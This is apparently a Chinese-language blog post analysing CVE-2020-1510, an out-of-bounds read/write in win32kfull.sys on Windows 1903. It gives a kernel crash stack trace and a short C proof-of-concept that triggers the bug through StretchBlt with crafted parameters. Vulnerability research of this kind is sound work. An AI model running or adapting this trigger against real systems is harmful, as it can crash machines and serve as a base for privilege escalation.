CVE-2020-1510漏洞分析

0x00漏洞信息

漏洞影响:本地提权

漏洞文件:win32kfull.sys

漏洞函数:pxrlStrRead01AND

漏洞原因:越界读写

分析系统:Windows 1903

【漏洞分析合集】

0x01漏洞分析

崩溃时的堆栈:

nt!KeBugCheckEx+0x107
nt!MiSystemFault+0x1d3171
nt!MmAccessFault+0x34f
nt!KiPageFault+0x360
win32kfull!pxrlStrRead01AND+0x5b
win32kfull!EngStretchBltNew+0xdc9
win32kfull!EngStretchBlt+0xd1
win32kfull!EngStretchBltROP+0x157
win32kfull!BLTRECORD::bStretch+0x37e
win32kfull!GreStretchBltInternal+0x721
win32kfull!NtGdiStretchBlt+0x68

和CVE-2020-1247漏洞原因一样只是触发位置不一样

0x02验证poc

#include <Windows.h>


int main()
{
    HDC r0 = CreateCompatibleDC(0x0);
    HBITMAP r1 = CreateCompatibleBitmap(r0, 0x3, 0x1);
    SelectObject(r0, r1);
    HDC  r2 = GetWindowDC(0x0);
    StretchBlt(r0, 0x0, 0x0, 0x800, 0x1, r2, 0x0, 0x7, 0xffffffffffeffff4, 0xfffffffffffffff8, 0xcc001c);

    return 0;
}

要开启特殊池稳定触发

方法看

CVE-2020-1247漏洞分析

posted @ 2023-02-27 16:07  紅人  阅读(148)  评论(0编辑  收藏  举报